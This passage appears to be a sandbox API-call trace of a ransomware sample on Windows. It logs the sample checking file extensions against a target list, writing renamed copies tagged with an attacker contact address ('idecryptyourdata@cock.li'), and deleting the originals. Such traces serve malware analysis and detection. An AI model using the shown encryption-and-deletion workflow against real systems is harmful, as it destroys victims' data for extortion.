Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP") returned 68 [0070.531] lstrlenW (lpString=".doc") returned 4 [0070.532] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0070.532] lstrlenW (lpString=".docx") returned 5 [0070.532] lstrcmpiW (lpString1=".docx", lpString2="3.BMP") returned -1 [0070.532] lstrlenW (lpString=".pdf") returned 4 [0070.532] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0070.532] lstrlenW (lpString=".xls") returned 4 [0070.532] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0070.532] lstrlenW (lpString=".xlsx") returned 5 [0070.532] lstrcmpiW (lpString1=".xlsx", lpString2="3.BMP") returned -1 [0070.532] lstrlenW (lpString=".ppt") returned 4 [0070.532] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0070.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP") returned 68 [0070.532] lstrlenW (lpString=".zip") returned 4 [0070.532] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0070.532] lstrlenW (lpString=".rar") returned 4 [0070.532] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0070.532] lstrlenW (lpString=".bz2") returned 4 [0070.532] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0070.532] lstrlenW (lpString=".7z") returned 3 [0070.532] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0070.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP") returned 68 [0070.532] lstrlenW (lpString=".dbf") returned 4 [0070.532] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0070.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP") returned 68 [0070.532] lstrlenW (lpString=".1cd") returned 4 [0070.532] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0070.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP") returned 68 [0070.532] lstrlenW (lpString=".jpg") returned 4 [0070.532] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0070.533] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.533] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101864.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0070.533] GetLastError () returned 0x0 [0070.533] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x7ce0, lpOverlapped=0x0) returned 1 [0070.560] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x7cf0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x7cf0, lpOverlapped=0x0) returned 1 [0070.561] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.561] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.561] SetEndOfFile (hFile=0x368) returned 1 [0070.561] CloseHandle (hObject=0x368) returned 1 [0070.562] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.562] SetEndOfFile (hFile=0x308) returned 1 [0070.563] CloseHandle (hObject=0x308) returned 1 [0070.563] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.563] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101864.bmp")) returned 1 [0070.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP") returned 68 [0070.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP") returned 68 [0070.564] lstrlenW (lpString=".doc") returned 4 [0070.564] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0070.564] lstrlenW (lpString=".docx") returned 5 [0070.564] lstrcmpiW (lpString1=".docx", lpString2="4.BMP") returned -1 [0070.564] lstrlenW (lpString=".pdf") returned 4 [0070.564] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0070.564] lstrlenW (lpString=".xls") returned 4 [0070.564] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0070.564] lstrlenW (lpString=".xlsx") returned 5 [0070.564] lstrcmpiW (lpString1=".xlsx", lpString2="4.BMP") returned -1 [0070.564] lstrlenW (lpString=".ppt") returned 4 [0070.564] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0070.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP") returned 68 [0070.564] lstrlenW (lpString=".zip") returned 4 [0070.564] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0070.564] lstrlenW (lpString=".rar") returned 4 [0070.564] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0070.564] lstrlenW (lpString=".bz2") returned 4 [0070.564] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0070.564] lstrlenW (lpString=".7z") returned 3 [0070.564] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0070.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP") returned 68 [0070.564] lstrlenW (lpString=".dbf") returned 4 [0070.564] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0070.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP") returned 68 [0070.564] lstrlenW (lpString=".1cd") returned 4 [0070.564] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0070.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP") returned 68 [0070.564] lstrlenW (lpString=".jpg") returned 4 [0070.564] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0070.565] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.565] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101980.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0070.565] GetLastError () returned 0x0 [0070.565] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x3ee8, lpOverlapped=0x0) returned 1 [0070.816] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3ef0, lpOverlapped=0x0) returned 1 [0071.203] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.203] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0071.204] SetEndOfFile (hFile=0x368) returned 1 [0071.204] CloseHandle (hObject=0x368) returned 1 [0071.204] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.204] SetEndOfFile (hFile=0x308) returned 1 [0071.205] CloseHandle (hObject=0x308) returned 1 [0071.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0071.205] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101980.wmf")) returned 1 [0071.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF") returned 68 [0071.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF") returned 68 [0071.206] lstrlenW (lpString=".doc") returned 4 [0071.206] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0071.206] lstrlenW (lpString=".docx") returned 5 [0071.206] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0071.206] lstrlenW (lpString=".pdf") returned 4 [0071.206] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0071.206] lstrlenW (lpString=".xls") returned 4 [0071.206] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0071.206] lstrlenW (lpString=".xlsx") returned 5 [0071.206] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0071.206] lstrlenW (lpString=".ppt") returned 4 [0071.206] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0071.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF") returned 68 [0071.206] lstrlenW (lpString=".zip") returned 4 [0071.206] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0071.206] lstrlenW (lpString=".rar") returned 4 [0071.206] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0071.206] lstrlenW (lpString=".bz2") returned 4 [0071.206] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0071.206] lstrlenW (lpString=".7z") returned 3 [0071.206] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0071.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF") returned 68 [0071.207] lstrlenW (lpString=".dbf") returned 4 [0071.207] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0071.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF") returned 68 [0071.207] lstrlenW (lpString=".1cd") returned 4 [0071.207] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0071.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF") returned 68 [0071.207] lstrlenW (lpString=".jpg") returned 4 [0071.207] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0071.207] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.207] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105276.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0071.208] GetLastError () returned 0x0 [0071.208] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x4b28, lpOverlapped=0x0) returned 1 [0071.646] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x4b30, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x4b30, lpOverlapped=0x0) returned 1 [0071.647] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.647] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0071.647] SetEndOfFile (hFile=0x368) returned 1 [0071.649] CloseHandle (hObject=0x368) returned 1 [0071.649] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.649] SetEndOfFile (hFile=0x308) returned 1 [0071.650] CloseHandle (hObject=0x308) returned 1 [0071.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0071.650] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105276.wmf")) returned 1 [0071.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF") returned 68 [0071.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF") returned 68 [0071.659] lstrlenW (lpString=".doc") returned 4 [0071.659] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0071.660] lstrlenW (lpString=".docx") returned 5 [0071.660] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0071.660] lstrlenW (lpString=".pdf") returned 4 [0071.660] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0071.660] lstrlenW (lpString=".xls") returned 4 [0071.660] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0071.660] lstrlenW (lpString=".xlsx") returned 5 [0071.660] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0071.660] lstrlenW (lpString=".ppt") returned 4 [0071.660] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0071.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF") returned 68 [0071.660] lstrlenW (lpString=".zip") returned 4 [0071.660] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0071.660] lstrlenW (lpString=".rar") returned 4 [0071.660] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0071.660] lstrlenW (lpString=".bz2") returned 4 [0071.660] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0071.660] lstrlenW (lpString=".7z") returned 3 [0071.660] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0071.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF") returned 68 [0071.660] lstrlenW (lpString=".dbf") returned 4 [0071.660] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0071.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF") returned 68 [0071.660] lstrlenW (lpString=".1cd") returned 4 [0071.660] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0071.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF") returned 68 [0071.660] lstrlenW (lpString=".jpg") returned 4 [0071.660] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0071.661] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.661] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105282.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0071.661] GetLastError () returned 0x0 [0071.661] ReadFile (in: hFile=0x39c, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x12bc, lpOverlapped=0x0) returned 1 [0072.225] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x12c0, lpOverlapped=0x0) returned 1 [0072.226] ReadFile (in: hFile=0x39c, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0072.226] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0072.226] SetEndOfFile (hFile=0x384) returned 1 [0072.226] CloseHandle (hObject=0x384) returned 1 [0072.226] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0072.226] SetEndOfFile (hFile=0x39c) returned 1 [0072.227] CloseHandle (hObject=0x39c) returned 1 [0072.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0072.227] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105282.wmf")) returned 1 [0072.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF") returned 68 [0072.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF") returned 68 [0072.228] lstrlenW (lpString=".doc") returned 4 [0072.228] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0072.228] lstrlenW (lpString=".docx") returned 5 [0072.228] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0072.228] lstrlenW (lpString=".pdf") returned 4 [0072.228] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0072.228] lstrlenW (lpString=".xls") returned 4 [0072.228] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0072.228] lstrlenW (lpString=".xlsx") returned 5 [0072.228] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0072.228] lstrlenW (lpString=".ppt") returned 4 [0072.228] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0072.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF") returned 68 [0072.228] lstrlenW (lpString=".zip") returned 4 [0072.228] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0072.228] lstrlenW (lpString=".rar") returned 4 [0072.228] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0072.228] lstrlenW (lpString=".bz2") returned 4 [0072.228] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0072.228] lstrlenW (lpString=".7z") returned 3 [0072.228] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0072.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF") returned 68 [0072.228] lstrlenW (lpString=".dbf") returned 4 [0072.228] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0072.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF") returned 68 [0072.228] lstrlenW (lpString=".1cd") returned 4 [0072.228] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0072.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF") returned 68 [0072.228] lstrlenW (lpString=".jpg") returned 4 [0072.228] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0072.403] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0072.403] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0072.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105294.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105294.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 10 os_tid = 0xefc [0045.416] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x65dba0 [0045.417] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x66dba8 [0045.417] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cf20 [0045.417] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x65d050 [0045.417] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cd58 [0045.417] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x38b3020 [0045.419] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62ce48 [0045.419] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62ce48, Size=0x20) returned 0x60e9d0 [0045.419] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cef0 [0045.419] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62cef0, Size=0x20) returned 0x60ea20 [0045.420] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0045.420] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0045.420] Wow64DisableWow64FsRedirection (in: OldValue=0x2a8ff50 | out: OldValue=0x2a8ff50*=0x0) returned 1 [0045.420] lstrlenW (lpString="kernel32.dll") returned 12 [0045.420] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e9d0 | out: hHeap=0x5d0000) returned 1 [0045.420] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0045.420] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ea20 | out: hHeap=0x5d0000) returned 1 [0045.420] Sleep (dwMilliseconds=0x64) [0045.636] lstrcmpiW (lpString1=".log", lpString2=".bat") returned 1 [0045.636] lstrlenW (lpString="PartnerSetupCompleteResult.log") returned 30 [0045.636] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.663] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=40) returned 1 [0046.663] CloseHandle (hObject=0x2e0) returned 1 [0046.663] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log")) returned 0x20 [0046.664] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.665] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.665] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.665] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.665] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0046.676] GetLastError () returned 0x0 [0046.676] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x28, lpOverlapped=0x0) returned 1 [0046.686] WriteFile (in: hFile=0x2cc, 